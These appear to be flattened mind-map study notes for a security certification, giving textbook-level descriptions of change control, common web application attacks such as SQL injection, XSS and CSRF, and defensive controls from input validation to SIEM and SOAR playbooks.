analyze the appropriate changes to remedy the situation. Change control includes conforming to quality control restrictions, developing tools for update or change deployment, properly documenting any coded changes, and restricting the effects of new code to minimize diminishment of security. Release Control Once the changes are finalized, they must be approved for release through the release control procedure. An essential step of the release control process is to double-check and ensure that any code inserted as a programming aid during the change process (such as debugging code and/or backdoors) is removed before releasing the new software to production. The DevOps Approach The word DevOps is a combination of Development and Operations, symbolizing that these functions must merge and cooperate to meet business requirements.The DevOps model aims to dramatically decrease the time required to develop, test, and deploy software changes.Some organizations even strive to reach the goal of continuous integration/continuous delivery (CI/CD), where code may roll out dozens or even hundreds of times per day. Application Programming Interfaces APIs allow application developers to bypass traditional web pages and interact directly with the underlying service through function calls.Offering and using APIs creates tremendous opportunities for service providers, but it also brings some security risks. Developers must be aware of these challenges and address them when they create and use APIs. First, developers must consider authentication requirements. APIs must also be tested thoroughly for security flaws, just like any web application. Service-Level Agreements Using service-level agreements (SLAs) is an increasingly popular way to ensure that organizations providing services to internal and/or external customers maintain an appropriate level of service agreed on by both the service provider and the vendor. It’s a wise move to put SLAs in place for any data circuits, applications, information processing systems, databases, or other critical components that are vital to your organization’s continued viability. The following issues are commonly addressed in SLAs: ■ ■ ■ ■ ■ ■ System uptime (as a percentage of overall operating time) Maximum consecutive downtime (in seconds/minutes/and so on) Peak load Average load Responsibility for diagnostics Failover time (if redundancy is in place) Service-level agreements also commonly include financial and other contractual remedies that kick in if the agreement is not maintained.
Malicious Code and Application Attacks
Application Attacks Buffer Overflows Buffer overflow vulnerabilities exist when a developer does not properly validate user input to ensure that it is of an appropriate size.Input that is too large can “overflow” a data structure to affect other data stored in the computer’s memory.
Injection Vulnerabilities
These vulnerabilities allow an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute. SQL Injection Attacks The attacker is able to provide input to the web application and then monitor the output of that application to see the result. Blind Content-Based SQL Injection In a content-based blind SQL injection attack, the perpetrator sends input to the web applica- tion that tests whether the application is interpreting injected code before attempting to carry out an attack.The ~ are tools for attackers before they acturally attack. Blind Timing-Based SQL Injection These attacks depend on delay mechanisms provided by different database platforms. Code Injection Attacks These attacks seek to insert attacker-written code into the legitimate code created by a web application developer. Any environment that inserts user-supplied input into code written by an application developer may be vulnerable to a code injection attack.
Exploiting Authorization Vulnerabilities
Injection vulnerabilities that allow an attacker to send code to systems and authentication vulnerabilities that allow an attacker to assume the identity of a legitimate user. Authorization vulnerabilities that allow an attacker to exceed the level of access that they are authorized. Directory Traversal These directory traversal attacks work when web servers allow the attackers who can navigate directory paths and file system on the server.
Exploiting Web Application Vulnerabilities
Web applications are complex ecosystems consisting of code, web platforms, operating systems, databases, and APIs. Cross-Site Scripting (XSS) Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page.Including:Reflected XSS,Stored/Persistent XSS. Cross-Site Request Forgery (CSRF/XSRF) CSRF attacks are similar to XSS attacks but exploit a different trust relationship. XSS attacks exploit the trust that a user has in a website to execute code on the user’s computer. CSRF attacks exploit the trust that remote sites have in a user’s system to execute commands on the user’s behalf. Session Hijacking Session hijacking attacks occur when a attcker intercepts part of the communication between an authorized user and a resource and then uses a hijacking technique to take over the session and assume the identity of the authorized user.
Application Security Controls
Input Validation User input should perform validation of that input to reduce the likelihood that it contains an attack.It is useful in protecting against SQL injection attack Web Application Firewalls Database Security-Parameterized Queries and Stored Procedures The developer prepares a SQL statement and then allows user input to be passed into that statement. Stored procedures work in a similar manner, but the major difference is that the SQL code is not contained within the application but is stored on the database server. Tokenization replaces personal identifiers that might reveal an individual’s identity with a unique identifier using a lookup table. Hashing uses a cryptographic hash function to replace sensitive identifiers with an alternative identifier.
子主题
Need to Know and Least Privilege The need-to-know principle imposes the requirement to grant users access only to data or resources they need to perform assigned work tasks. The least privilege principle states that subjects are granted only the privileges necessary to perform assigned work tasks and no more. Separation of Duties (SoD) and Responsibilities Separation of duties (SoD) and responsibilities ensures that no single person has total control over a critical function or system. Job Rotation Job rotation (sometimes called rotation of duties) means that employees rotate through jobs or rotate job responsibilities with other employees. Mandatory Vacations This provides a form of peer review and helps detect fraud and collusion.
Preventing and Responding to Incidents
Intrusion Detection and Prevention Systems Intrusion detection systems (IDSs) and intru- sion prevention systems (IPSs) are two methods organizations typically implement to detect and prevent attacks.An intrusion detection system (IDS) automates the inspection of logs and real-time system events to detect intrusion attempts and system failures.Knowledge- and Behavior-Based Detection.Host- and Network-Based IDSs An intrusion prevention system (IPS) is a special type of active IDS that attempts to detect and block attacks before they reach target systems. Honeypots and Honeynets Honeypots are individual computers created as a trap for intruders or insider threats. A honeynet is two or more networked honeypots used together to simulate a network. Sandboxing Sandboxing provides a security boundary for applications and prevents the application from interacting with other applications. Firewalls include rules within an ACL to allow specific traffic and end with an implicit deny rule. use logs to re-create events leading up to and during an incident,it’s important to protect log files against unauthorized access and unauthorized modification.It’s common to store copies of logs on a central system, such as a security information and event management (SIEM) system, to protect it. SIEM provide centralized logging and real-time analysis of events occurring on systems throughout an organization. Security orchestration(/ˌɔːrkɪˈstreɪʃn/), automation, and response (SOAR) refers to a group of technologies that allow organizations to respond to some incidents automatically. SOAR allows security administrators to define these incidents and the response, typically using playbooks and runbooks: Playbook A playbook is a document or checklist that defines how to verify an incident. Additionally, it gives details on the response. A playbook for the SYN flood attack would list the same actions security administrators take to verify a SYN flood is under way. It would also list the steps administrators take after verifying it is a SYN flood attack. Runbook A runbook implements the playbook data into an automated tool. For example, if an IDS alerts on the traffic, it implements a set of conditional steps to verify that the traffic is a SYN flood attack using the playbook’s criteria. If the IDS confirms the attack, it then performs specified actions to mitigate the threat.